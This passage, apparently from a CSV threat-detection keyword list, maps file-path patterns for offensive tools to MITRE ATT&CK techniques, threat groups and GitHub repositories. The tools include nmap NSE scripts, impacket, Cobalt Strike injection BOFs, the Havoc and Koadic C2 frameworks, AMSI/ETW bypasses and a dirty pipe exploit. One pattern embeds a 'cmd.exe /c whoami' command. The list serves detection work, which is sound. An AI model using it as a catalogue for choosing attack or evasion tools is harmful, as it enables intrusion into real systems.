-*/ike-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/imap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/imap-capabilities.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/imap-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/imfiver/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/imfiver/CVE-2022-0847,1,1,N/A,N/A,3,257,74,2023-02-02T02:17:30Z,2022-03-07T18:36:50Z
-*/impacket.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*/impacket/*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*/impersonate-rs*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,1,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z
-*/imperun * *cmd.exe /c whoami*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,0,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z
-*/Imperva_gzip_WAF_Bypass*,offensive_tool_keyword,Imperva_gzip_WAF_Bypass,Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.,T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220,TA0001 - TA0002 - TA0003 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/BishopFox/Imperva_gzip_WAF_Bypass,1,1,N/A,N/A,2,146,29,2022-01-07T17:39:29Z,2022-01-07T17:38:33Z
-*/implant/callback*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*/implant/elevate/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z
-*/implant/register_cmd*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z
-*/implants/*/Syscalls.*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z
-*/ImplantSSP.exe*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*/impress-remote-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/inceptor.git*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z
-*/inceptor.git*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z
-*/infection_monkey/*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*/Infoga*,offensive_tool_keyword,Infoga,Email Information Gathering.,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/m4ll0k/Infoga,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A
-*/informix-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/informix-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/informix-tables.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/inject.cpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/Inject/Dll/LoadDll*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/Inject/PE/*.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/Inject/ShellCode/*.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/injectAmsiBypass/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/injectAmsiBypass,1,1,N/A,10,10,362,67,2023-03-08T15:54:57Z,2021-07-19T00:08:21Z -*/inject-assembly/*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*/injectEtw.*,offensive_tool_keyword,cobaltstrike,CobaltStrike BOF - Inject ETW Bypass into 
Remote Process via Syscalls (HellsGate|HalosGate),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/injectEtwBypass,1,1,N/A,10,10,253,54,2021-09-28T19:09:38Z,2021-09-21T23:06:42Z -*/Injection/clipboard/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 
- Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/conhost/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/createremotethread/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/ctray/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/dde/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/Injection.cna*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 
- APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/kernelcallbacktable*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/ntcreatethread*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/ntcreatethread/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/ntqueueapcthread*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
